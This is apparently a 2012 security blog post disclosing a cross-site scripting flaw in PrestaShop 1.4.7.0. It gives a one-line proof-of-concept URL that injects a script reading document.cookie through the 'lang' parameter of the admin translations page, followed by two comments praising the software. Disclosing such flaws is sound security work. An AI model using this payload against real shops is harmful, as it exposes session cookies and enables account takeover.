Sunday, 18 March 2012

[EN] PrestaShop 1.4.7.0 - XSS for logged-in users


# TITLE ....... # PrestaShop 1.4.7.0 XSS for loged-in users ............. #
# DATE ........ # 14.03.2012 ............................................ #
# AUTOHR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.

#............................................#
# 3. Where is bug :)

Log in as Your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token


#............................................#
# 4. More...

- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#

2 comments:

  1. In my opinion prestashop is one from the best estore software!

    ReplyDelete
  2. Yeah I agree Prestashop Themes are really the best template you can use to get a professional looked shopping website. The good thing about Prestashop it's open-source and customizable.

    ReplyDelete

What do You think...?